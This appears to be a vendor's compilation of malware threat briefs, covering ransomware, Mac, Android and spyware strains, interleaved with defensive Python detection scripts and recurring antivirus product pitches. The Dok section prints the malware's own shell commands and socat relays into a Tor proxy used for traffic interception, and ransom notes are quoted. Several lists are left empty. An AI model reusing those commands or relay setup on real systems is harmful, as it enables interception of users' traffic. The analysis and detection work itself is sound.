Mikoyan ransomware

The infection process of .MIKOYAN ransomware is very similar to that of other ransomware. The malware may take advantage of massive spam campaigns that distribute malicious attachments as well as web links that lead to the download of the infection files. Such e-mails are cleverly orchestrated in a manner that aims to convince users to open the attachment.

Besides via e-mail, the .MIKOYAN ransomware virus may also be replicated via multiple other methods such as:

Exploit kits.
Via a previous infection with a botnet or a Trojan.
Through fake installers, flash player updates or other setup wizards.
Via fake key generators or license activators uploaded on torrent websites.

Once this ransomware infection has become active on a computer, the .MIKOYAN virus drops its malicious payload files. They are often located in the following Windows directories:

Besides the main executable of the MIKOYAN ransomware, named MIKOYAN.exe, the virus may also drop other malicious files under different names, often randomly generated ones. After the encryption process has completed, the ransomware appends the .MIKOYAN file extension to the files it encrypted.

To run on startup, the MIKOYAN ransomware may also modify the Windows Registry, more specifically the Run and RunOnce registry keys:

As always, we recommend that you keep an updated copy of Max Total Security on your PC, which can restore your files from its daily built-in backup. Also, 24×7 free support can help you with any issues. You can get it from here: Max Total Security.

XPan Ransomware

The XPan Ransomware is being used to target small and medium businesses located in Brazil (although there is nothing limiting these attacks to Brazil, since they can target computers anywhere). The XPan Ransomware attacks are carried out by taking advantage of poorly protected remote desktop connections. Exploiting weak password protection and security measures, con artists can install the XPan Ransomware on the victims’ computers, as well as carry out other threatening operations.

The ransomware, suspected to be distributed by a group of small-time cybercriminals, has already affected many computers belonging to small and medium businesses in the country. The similarities between XPan and .one ransomware were found during an in-depth analysis of the malicious program. The similarities include the target file extensions, ransom note, commands executed before and after the encryption process and even the public RSA keys of the criminals.

For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the API CryptDeriveKey, and proceeds to encrypt the file content using AES-256 in CBC mode with a zero IV. According to one of the victims, the criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as they did before: the user sends a message to a mailbox with his unique ID and awaits further instructions.

OSX Malware – Dok

People often assume that if you’re running OSX, you’re relatively safe from malware. But this is becoming less and less true, as evidenced by a new strain of malware encountered by the Check Point malware research team. This new malware – dubbed OSX/Dok — affects all versions of OSX.

This is the first “major scale” malware directed at Mac owners through a “coordinated email phishing campaign.” The emails are aimed mostly at Europeans, one example being a German-language message from a supposed Swiss official, claiming problems with the target’s tax return.

The malware works by gaining administration privileges in order to install a new root certificate on the user’s system. This enables it to gain access to all communications between the host Mac and the internet, including traffic flowing through connections encrypted with SSL.
The malware later presents the user with a security message claiming an update is available for the system, for which a password input is required. Following the “update”, the malware gains complete control of admin privileges, adjusts the network settings to divert all outgoing connections through a proxy, and installs additional tools that enable it to perform a man-in-the-middle attack on all traffic.

The malware bundle is contained in a .zip archive named Dokument.zip. It was signed on April 21st 2017 by a “Seven Muller” and the bundle name is Truesteer.AppStore.

Upon execution, the malware will copy itself to the /Users/Shared/ folder, and will then proceed to execute itself from the new location by running the shell commands below:

chmod +x /Users/Shared/AppStore.app                        # gives all users execute permission
rm -fr "/Users/_%USER%_/Downloads/Dokument.app"             # deletes the original copy
"/Users/Shared/Appstore.app/Contents/MacOS/AppStore" Dokument   # executes the application from its new location

The malware will also install 2 LaunchAgents that will start with system boot, and have the following names:



These LaunchAgents will redirect requests through the Tor hidden service address “paoyu7gub72lykuk.onion”. This is necessary for the PAC configuration described above to work (note that the original configuration looks for the PAC file on the local host).

These LaunchAgents consist of the following BASH commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050

As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please.
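The socat lines and the local-host PAC lookup above make the Dok setup detectable from a LaunchAgent plist alone. The following Python is an added example, not code from the original report or from Check Point: it parses a LaunchAgent, recognises a socat TCP listener that relays into a local SOCKS port (9050 is Tor's default), and checks whether the system's auto-proxy (PAC) URL points at one of those relay ports. The plist layout, the label "com.example.placeholder.agent", the bind address and the ".onion" target are constructed placeholders, since the report quotes the socat commands with those values stripped and does not show the plist itself.

```python
import plistlib
import re
from urllib.parse import urlparse

# Constructed sample LaunchAgent plist modelled on the socat command quoted in the
# report. Label, bind address and the .onion hostname are placeholders, not values
# from the Dok sample.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.placeholder.agent</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:placeholder.onion:80,socksport=9050</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""


def parse_socat_forward(cmdline):
    """Return listen port, SOCKS port and target if the command line is a socat
    TCP listener forwarding into a SOCKS4/SOCKS4A proxy, else None."""
    if "socat" not in cmdline:
        return None
    listen = re.search(r"LISTEN:(\d+)", cmdline)
    socks = re.search(r"SOCKS4A?:([^,\s]*)", cmdline)
    socksport = re.search(r"socksport=(\d+)", cmdline)
    if not (listen and socks):
        return None
    return {
        "listen_port": int(listen.group(1)),
        # socat's default SOCKS port is 1080 when socksport= is absent
        "socks_port": int(socksport.group(1)) if socksport else 1080,
        "target": socks.group(1),
    }


def assess_launch_agent(plist_bytes):
    """Load a LaunchAgent and report the indicators that match the Dok setup."""
    agent = plistlib.loads(plist_bytes)
    cmdline = " ".join(agent.get("ProgramArguments", []))
    fwd = parse_socat_forward(cmdline)
    if fwd is None:
        return {"label": agent.get("Label"), "suspicious": False, "reasons": []}
    reasons = ["socat TCP listener relaying into a SOCKS proxy"]
    if fwd["socks_port"] == 9050:
        reasons.append("SOCKS port 9050 (Tor default)")
    if ".onion" in fwd["target"]:
        reasons.append("forwarding target is a .onion address")
    if agent.get("RunAtLoad"):
        reasons.append("RunAtLoad set: relay starts at login")
    return {"label": agent.get("Label"), "suspicious": True, "forward": fwd, "reasons": reasons}


def pac_url_points_at_relay(pac_url, relay_ports):
    """True if the auto-proxy (PAC) URL is served from one of the local relay
    ports, i.e. browsers would fetch their proxy settings through the Tor relay."""
    u = urlparse(pac_url)
    return u.hostname in ("127.0.0.1", "localhost") and u.port in relay_ports


if __name__ == "__main__":
    result = assess_launch_agent(SAMPLE_PLIST)
    print(result)
    ports = {result["forward"]["listen_port"]} if result["suspicious"] else set()
    # On a real Mac the PAC URL comes from: networksetup -getautoproxyurl Wi-Fi
    print(pac_url_points_at_relay("http://127.0.0.1:5555/proxy.pac", ports))
```

On a live system you would feed assess_launch_agent() every file under ~/Library/LaunchAgents and /Library/LaunchAgents, and take the PAC URL from `networksetup -getautoproxyurl` for each network service; a PAC served from 127.0.0.1 on a port that a socat agent listens on is the combination worth escalating.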

Beware of email attachments, and do not enter your root password when asked by any app. Also, keep an updated copy of Mac Total Security by Max Secure Software.

MilkyDoor Android Malware

A newly discovered Android malware called MilkyDoor turns mobile devices into “walking backdoors” that give attackers access to whatever network an infected user is connected to. Affected phones essentially act as proxy servers that link legitimate networks with malicious command-and-control servers via Socket Secure (SOCKS) protocol, allowing bad actors to exfiltrate data.

It uses remote port forwarding via Secure Shell (SSH) tunnels to hide malicious traffic and grant attackers access to firewall-protected networks. The malware was recently found in over 200 Android applications available through the Play Store. Google has removed them from their official app store.

In total, researchers estimate the apps had between 500,000 and 1 million installs through the Play Store alone.
While MilkyDoor appears to be DressCode’s successor, MilkyDoor adds a few malicious tricks of its own. Among them are its more clandestine routines that enable it to bypass security restrictions and conceal its malicious activities within normal network traffic. It does so by using remote port forwarding via Secure Shell (SSH) tunnel through the commonly used Port 22. The abuse of SSH helps the malware encrypt malicious traffic and payloads, which makes detection of the malware trickier.

We found these Trojanized apps masquerading as recreational applications ranging from style guides and books for children to Doodle applications. We surmise that these are legitimate apps which cybercriminals repackaged and Trojanized then republished in Google Play, banking on their popularity to draw victims.

MilkyDoor poses a greater risk to businesses because it is coded to attack an enterprise’s internal networks, private servers, and ultimately corporate assets and data. The way MilkyDoor builds an SSH tunnel presents security challenges for an organization’s network, particularly in networks that integrate BYOD devices. Its stealth lies in how the infected apps themselves don’t request sensitive permissions and consequently exist on the device with regular or seemingly benign communication behavior.

The repercussions are also significant. MilkyDoor can covertly grant attackers direct access to a variety of an enterprise’s services—from web and FTP to SMTP in the internal network. The access can then be leveraged to poll internal IP addresses in order to scan for available—and vulnerable—servers. The recent spate of compromises of MongoDB and ElasticSearch databases, where their owners were also extorted, is a case in point. Those servers were reachable from the internet, which was made worse by the lack of authentication mechanisms in the databases themselves.
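Because the infected apps hold no sensitive permissions, the network is the better place to spot MilkyDoor: a phone on the BYOD Wi-Fi holding a long-lived SSH session to an internet host, while the attacker's traffic flows back through that tunnel. The Python below is an added example, not code from Trend Micro or from the original post. It runs a simple rule over constructed flow records (source, destination, destination port, duration, bytes out, bytes in): outbound TCP/22 from the BYOD range to a non-RFC1918 address, lasting longer than a threshold, is reported per source/destination pair. The BYOD range 10.50.0.0/16, the 600-second threshold and the RFC 5737 documentation addresses in the sample are assumptions chosen for the example.

```python
import ipaddress
from collections import defaultdict

# Assumed BYOD / guest Wi-Fi range; adjust to the real network plan.
BYOD_NETS = [ipaddress.ip_network("10.50.0.0/16")]
# RFC 1918 ranges count as internal; everything else is treated as the internet.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LONG_LIVED_S = 600  # assumed threshold: interactive SSH rarely lasts this long from a phone

# Constructed sample flow records: (src, dst, dst_port, duration_s, bytes_out, bytes_in).
# External addresses are RFC 5737 documentation addresses, not real hosts.
SAMPLE_FLOWS = [
    ("10.50.3.17", "203.0.113.45", 22, 4200, 1_850_000, 2_100_000),  # phone: hours-long SSH to the internet
    ("10.50.3.17", "203.0.113.45", 22, 3900, 1_200_000, 1_700_000),  # same pair, reconnected
    ("10.50.8.9", "198.51.100.20", 443, 12, 2_000, 40_000),          # ordinary HTTPS from a phone
    ("10.10.1.5", "10.10.1.20", 22, 900, 30_000, 120_000),           # admin SSH inside the LAN, not BYOD
    ("10.50.4.21", "198.51.100.7", 22, 20, 3_000, 5_000),            # short SSH, below threshold
]


def in_byod(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BYOD_NETS)


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def flag_ssh_tunnels(flows, min_duration=LONG_LIVED_S):
    """Return {(src, dst): summary} for BYOD hosts holding long-lived outbound
    SSH sessions to internet hosts. Sessions are aggregated per pair so a device
    that reconnects repeatedly still shows up as one alert."""
    hits = defaultdict(lambda: {"sessions": 0, "duration_s": 0, "bytes_out": 0, "bytes_in": 0})
    for src, dst, dport, duration, b_out, b_in in flows:
        if dport != 22 or not in_byod(src) or is_internal(dst):
            continue
        if duration < min_duration:
            continue
        h = hits[(src, dst)]
        h["sessions"] += 1
        h["duration_s"] += duration
        h["bytes_out"] += b_out
        h["bytes_in"] += b_in
    return dict(hits)


def render_alerts(hits):
    """Human-readable alert lines for a SOC queue."""
    return [
        f"BYOD host {src} held {h['sessions']} SSH session(s) to {dst} "
        f"for {h['duration_s']}s total ({h['bytes_in']} bytes inbound through the tunnel)"
        for (src, dst), h in sorted(hits.items())
    ]


if __name__ == "__main__":
    for line in render_alerts(flag_ssh_tunnels(SAMPLE_FLOWS)):
        print(line)
```

The inbound byte count matters: with remote port forwarding the attacker's connections enter through the phone, so a tunnel that is actively used shows traffic arriving from the internet host and leaving the phone toward internal addresses. Pairing this rule with a second one for the phone's new connections to internal web, FTP and SMTP ports, as the text describes, turns a weak signal into a strong one.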

End users and enterprises can benefit from a mobile security solution such as Max Total Security, available on Google Play.

SMSVova Spyware - Android

SMS-based Spyware, which can steal and relay a victim’s location to an attacker in real time, was downloaded between 1 and 5 million times before being pulled from Google’s official U.S. Play Store. On the Play Store, the app was titled “System Update,” suggesting that users who download it would receive the latest Android release.

The malware, called SMSVova, is capable of pinpointing a user’s exact geolocation and then sending that data to an attacker. However, upon installing and opening SMSVova, the app immediately quits, delivering the following message: “Unfortunately, Update Service has stopped.” The app then hides itself from the main screen.

At this point, the app enables a MyLocationService feature that tracks a user’s last known location. It also scans for SMS message commands, which the attacker sends in order to adjust malware settings and ultimately request a user’s device location. The attacker can even specifically ask to receive a location alert when the victim’s battery is running low.


Despite the error message, the spyware sets up an Android service and broadcast receiver:

MyLocationService: Fetches last known location
IncomingSMS (Receiver): Scans for incoming SMS messages

MyLocationService fetches the user’s last known location and stores it in Shared Preferences. Shared Preferences is one of the many ways Android stores an application’s data.
IncomingSMS is designed to look for incoming SMS messages with a particular syntax, in which the message should be more than 23 characters and should contain “vova-” in the SMS body. It also scans for a message containing “get faq.”
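The command syntax described for IncomingSMS (a body longer than 23 characters containing “vova-”, or one containing “get faq”) is the one observable an SMS gateway or MDM message filter can match on. The Python below is an added example, not code from the original post or from the researchers who analysed SMSVova: it encodes that filter and runs it over a constructed message log, counting which senders are issuing commands. The sender numbers and message bodies are constructed; whether the real receiver matches case-insensitively is not stated in the text, so exact matching is assumed.

```python
# Thresholds and markers taken from the description of the IncomingSMS receiver.
MIN_COMMAND_LENGTH = 23          # body must be longer than this
COMMAND_MARKER = "vova-"
FAQ_MARKER = "get faq"

# Constructed sample SMS log; numbers and bodies are placeholders.
SAMPLE_SMS = [
    {"from": "+15550100001", "body": "Running late, see you at 7"},
    {"from": "+15550100002", "body": "vova-placeholder command text here"},  # 34 chars, marker present
    {"from": "+15550100002", "body": "get faq"},
    {"from": "+15550100003", "body": "vova-x"},                              # marker but too short
]


def is_smsvova_command(body):
    """True if an SMS body matches the command syntax attributed to SMSVova's
    IncomingSMS receiver. Exact, case-sensitive matching is an assumption."""
    if len(body) > MIN_COMMAND_LENGTH and COMMAND_MARKER in body:
        return True
    return FAQ_MARKER in body


def flag_messages(messages):
    """Return the messages from a log that look like operator commands."""
    return [m for m in messages if is_smsvova_command(m["body"])]


def senders_issuing_commands(messages):
    """Count command-like messages per sender; a number that keeps issuing
    commands is the operator's control channel and a candidate for blocking."""
    counts = {}
    for m in flag_messages(messages):
        counts[m["from"]] = counts.get(m["from"], 0) + 1
    return counts


if __name__ == "__main__":
    for m in flag_messages(SAMPLE_SMS):
        print(f"command-like SMS from {m['from']}: {m['body']!r}")
    print(senders_issuing_commands(SAMPLE_SMS))
```

Matching the marker alone is too loose (“vova-x” in the sample is skipped by the length rule, just as the receiver would skip it); the length condition is what the malware itself applies, so reproducing it keeps the filter's hit rate in line with what the spyware would actually act on.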

matrix9643@yahoo.com ransomware

Matrix virus, also known as matrix9643@yahoo.com ransomware, functions as a crypto-Trojan. Matrix Ransomware has worm-like features that allow it to spread beyond the originally infected machine via Windows shortcuts. This malware appends the “.matrix” or “.b10cked” extension to the name of every encrypted file. For instance, “sample.jpg” is renamed to “sample.jpg.matrix”. Following successful encryption, Matrix creates a text file “matrix-readme.rtf” (newer variants drop “Readme-Matrix.rtf” or “WhatHappenedWithMyFiles.rtf”) containing the ransom-demanding message and places it in every folder.


While performing the encryption, Matrix will hide a folder and then create a shortcut with the same name. It will then make a copy of the ransomware executable and save it as desktop.ini in the original folder:

Clicking on any shortcut will launch the malware program.
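The hidden-folder, same-name-shortcut and executable-as-desktop.ini layout just described is a file-system pattern a scanner can look for directly. The Python below is an added example, not code from the original post: it builds a constructed directory tree that mimics the layout (a real desktop.ini is a small text file; a PE executable starts with the bytes “MZ”), then walks a root and reports a .lnk that shadows a sibling folder of the same name and any desktop.ini that is actually an executable. The folder names, the stub bytes and the hidden-attribute check are assumptions; the hidden attribute only exists on Windows, so on other platforms that part reports False.

```python
import os
import stat
import tempfile


def is_hidden(path):
    """Windows hidden attribute; False on platforms without file attributes."""
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    return bool(attrs & getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0))


def scan_for_matrix_layout(root):
    """Walk root and return (kind, path) findings for the two indicators:
    a .lnk whose stem equals a sibling directory, and a desktop.ini that is a PE."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        siblings = set(dirnames)
        for name in filenames:
            full = os.path.join(dirpath, name)
            stem, ext = os.path.splitext(name)
            if ext.lower() == ".lnk" and stem in siblings:
                # A shortcut named exactly like a folder beside it; on Windows the
                # folder would typically also carry the hidden attribute.
                findings.append(("shortcut_shadows_folder", full))
            if name.lower() == "desktop.ini":
                with open(full, "rb") as f:
                    if f.read(2) == b"MZ":  # PE/DOS header; a genuine desktop.ini is INI text
                        findings.append(("executable_desktop_ini", full))
    return findings


def build_sample_tree():
    """Constructed sample tree reproducing the described layout plus a benign control."""
    root = tempfile.mkdtemp(prefix="matrix_demo_")
    docs = os.path.join(root, "Documents")
    os.makedirs(docs)
    with open(os.path.join(docs, "desktop.ini"), "wb") as f:
        f.write(b"MZ" + b"\x90" * 62)          # constructed stub with a PE magic, not real malware
    with open(os.path.join(root, "Documents.lnk"), "wb") as f:
        f.write(b"L\x00\x00\x00")              # constructed shortcut header bytes only
    pics = os.path.join(root, "Pictures")       # benign control: genuine INI-style desktop.ini
    os.makedirs(pics)
    with open(os.path.join(pics, "desktop.ini"), "wb") as f:
        f.write(b"[.ShellClassInfo]\r\nIconResource=placeholder.dll,0\r\n")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for kind, path in scan_for_matrix_layout(sample_root):
        print(f"{kind}: {path} (hidden={is_hidden(os.path.dirname(path))})")
```

Run against a user profile or a file share, the scanner's first indicator catches the worm-like spread the text mentions (a shortcut that launches the copy in place of opening the folder), while the second catches the dropped executable even after the shortcut has been cleaned up.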

Files associated with the Matrix Ransomware:
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[random].hta

Network Communication:

With the increase in everyday ransomware activity, users are strongly recommended to back up their files on a daily basis to minimize loss of data, and to use a good anti-virus program such as Max Total Security, which can take daily backups with highly configurable options for users.

Rijndael Ransomware - another encryptor

The Rijndael Ransomware may be contained in files named ‘BitcoinMiner.exe’ and ‘r4ns0mw4r3.exe’ and seems to be the work of a coder who goes by the online handle ‘humanpuff69.’ This coder has uploaded YouTube videos with information on how to create rogue security software and clones of CryptoWall. Like most ransomware Trojans, the Rijndael Ransomware is designed to block all access to the victim’s files by encrypting them using a strong encryption algorithm. The files affected by the Rijndael Ransomware will have the file extension ‘.fucked’ appended to each file’s name. The Rijndael Ransomware is capable of encrypting a wide variety of files.
To display its ransom note, the Rijndael Ransomware uses a program window that includes the message below:

‘Deathnote Hackers Was Here !
Your Computer files is encrypted
all files is encrypted with extremely
powerfull new RIDNDAEL encryption
that no one can break except you have
a private string and IVs
To Decrypt Your File You Should Pay Me
0.5 BTC (864.98 USD)
Contact Me : Riptours01@gmail.com
insert your code here:
[TEXT BOX] Decrypt!

Although it is usually impossible to recover data encrypted by Trojans like the Rijndael Ransomware, the Rijndael Ransomware’s decryption key is hard-coded into its main executable file and has been recovered. Victims can enter the code ’83KYG9NW-3K39V-2T3HJ-93F3Q-GT’ into the text box included in the Rijndael Ransomware ransom message to restore their files. It is likely that the con artists will update the Rijndael Ransomware to remove this weakness, but for now it is possible for computer users to recover their files from the attack.
Users can recover their encrypted file from Max Total Security Backup module.

Ramnit Trojan in new malvertising campaign

There has been an increase in malvertising activity coming from adult websites that have significant traffic (several million monthly visits each). Malicious actors are using pop-under ads (adverts that load in a new browser window under the current active page) to surreptitiously redirect users to the RIG exploit kit. It has mostly hit Canada and the UK.

Ramnit spies on you, and everything it finds it sends to the crooks behind it. We are talking IPs, usernames, passwords, accounts, email addresses, browser-related data, etc. Consider your private life no longer private. And last, but definitely not least, the Trojan may try to steal your money by making you purchase some fake anti-virus product or presenting you with a fake update. Trust nothing. It is all a scam for profit. Don’t click on, and definitely don’t buy, anything Ramnit suggests, as you will only worsen your already bad situation.

To manually find its infection, do the following:
1. Run the Task Manager by right-clicking on the Taskbar and choosing Start Task Manager. Look carefully at the file names and descriptions of the running processes. If you find a suspicious one, search on Google for its name. If you find a malware process, right-click on it and choose End task.

2. Open Control Panel by holding the Win Key and R together. Write appwiz.cpl in the field, then click OK. Here, find any program you had no intention to install and uninstall it.

3. Open MS Config by holding the Win Key and R together. Type msconfig and hit Enter. Go to the Startup tab and uncheck entries that have “Unknown” as Manufacturer.

4. Scan with Max Total Security. If you still think your PC may be infected, contact Max Secure Software free 24×7 technical support.
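The msconfig Startup tab in step 3 is a manual look at the same Run and RunOnce keys that the MIKOYAN section above says the ransomware modifies to survive a reboot. The Python below is an added example, not code from the original post or from Max Secure Software: it parses a .reg export of those keys (the kind produced by `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg`), pulls the executable path out of each command line, and flags entries that run from user-writable locations (AppData, Temp, Downloads, Public, ProgramData), which is where dropped payloads usually live. The sample export is constructed: the “ExampleAgent” entry and its path are placeholders, and the MIKOYAN.exe and x7f2a.exe values are made up to illustrate the check; only the Run/RunOnce key names and the MIKOYAN.exe file name come from the text. Legitimate per-user installers also use AppData, so the output is a triage list, not a verdict.

```python
import re

# "name"="value" lines in a .reg export; REG_SZ values are quoted with backslashes doubled.
REG_VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')

# Assumed user-writable locations where dropped payloads commonly run from.
SUSPICIOUS_DIRS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")

# Constructed sample .reg export. Paths and value names are placeholders.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ExampleAgent"="\"C:\\Program Files\\ExampleVendor\\agent.exe\" /tray"
"Updater"="C:\\Users\\alice\\AppData\\Roaming\\MIKOYAN.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"x7f2a"="C:\\Users\\alice\\AppData\\Local\\Temp\\x7f2a.exe"
'''


def parse_reg_export(text):
    """Return [{'key', 'name', 'command'}] for every string value in a .reg export."""
    entries = []
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = REG_VALUE_RE.match(line)
        if key and m:
            # Undo .reg escaping: \" -> " first, then \\ -> \
            command = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
            entries.append({"key": key, "name": m.group(1), "command": command})
    return entries


def extract_exe_path(command):
    """Executable path from a Run-key command line: the quoted part if quoted,
    else the first token (unquoted paths containing spaces are not handled)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command
    return command.split(" ")[0]


def audit_run_keys(reg_text):
    """Flag Run/RunOnce entries whose executable lives in a user-writable directory."""
    findings = []
    for e in parse_reg_export(reg_text):
        k = e["key"].lower()
        if not (k.endswith("\\run") or k.endswith("\\runonce")):
            continue
        exe = extract_exe_path(e["command"])
        reasons = [d.strip("\\") for d in SUSPICIOUS_DIRS if d in exe.lower()]
        if reasons:
            findings.append({"key": e["key"], "name": e["name"], "exe": exe, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_run_keys(SAMPLE_REG):
        print(f"{f['key']}\\{f['name']} -> {f['exe']}  [{', '.join(f['reasons'])}]")
```

Export HKLM's Run and RunOnce keys as well and feed both files through audit_run_keys(); an entry that is flagged and whose file is unsigned or absent from the vendor's documented install path is the one to investigate, and a RunOnce value is worth capturing immediately because Windows deletes it after its first execution.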

AngryKite ransomware

Once infiltrated, AngryKite encrypts various data and renames compromised files using the “[random_characters].NumberDot” pattern. For example, “sample.jpg” might be renamed to “G4ag0-3tga.NumberDont”. Following successful encryption, AngryKite opens a pop-up window containing a fake error message.

The message states that a malware infection has been detected and that files are encrypted. To remove the malware, victims are encouraged to call the toll-free phone number provided (“1-855-545-6800”). Victims are then supposedly guided through the malware removal process. In fact, this is a scam.

Text presented within AngryKite pop-up:

WARNING: SYSTEM MAY HAVE FOUND anonymous encryption on your computer. You would not be able to access the files on your computer. Your System May have Found (2) Malicious Viruses Rootkit.Encrypt & Trojan.Spyware Your Personal & Financial information MAY NOT BE SAFE Your system has encryption ransomware which may permanently encrypt your data Please call immediately to avoid further damage Toll free 1-855-545-6800.

Right now no methods are available to get rid of this malware other than restoring your files from backup. It is recommended to keep an updated copy of Max Total Security, which takes a daily backup of the files on your PC.

Chrysaor Malware on Android

Chrysaor is spyware believed to be created by NSO Group Technologies, specializing in the creation and sale of software and infrastructure for targeted attacks. Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS. Chrysaor is a highly sophisticated malware most likely used to carry out advanced espionage campaigns.

Chrysaor doesn’t exploit a vulnerability. Instead, Google believes attackers coax specifically targeted individuals to download the Chrysaor malware onto their device. “Once Chrysaor is installed, a remote operator is able to surveil the victim’s activities on the device and within the vicinity, leveraging microphone, camera, data collection, and logging and tracking application activities on communication apps such as phone and SMS,” wrote Google.

Upon installation, the app uses Framaroot rooting techniques to find security holes that allow the attackers to escalate privileges and break Android’s application sandbox, Google said. “If the targeted device is not vulnerable to these exploits, then the app attempts to use a superuser binary pre-positioned at /system/csk to elevate privileges,” according to Google.

Chrysaor is also very careful when it comes to being detected and is programmed to uninstall itself if there is any chance it has been found. It will remove itself from the phone if the SIM MCC ID is invalid, an ‘antidote’ file exists, it has not been able to check in with its servers for 60 days, or it receives a command from the server to remove itself.
Chrysaor had a very low volume of installs outside of Google Play: fewer than three dozen installs on victim devices. These devices were located in the following countries:

To ensure you are fully protected against Potentially Harmful Applications (PHAs) and other threats, we recommend these 5 basic steps:

1. Install apps only from reputable sources: Install apps from a reputable source, such as Google Play.
2. Enable a secure lock screen: Pick a PIN, pattern, or password that is easy for you to remember and hard for others to guess.
3. Update your device: Keep your device up-to-date with the latest security patches.
4. Locate your device: Practice finding your device with Android Device Manager because you are far more likely to lose your device than install a PHA.
5. Keep a good anti-virus or Android total security product installed on your device, such as Max Total Security.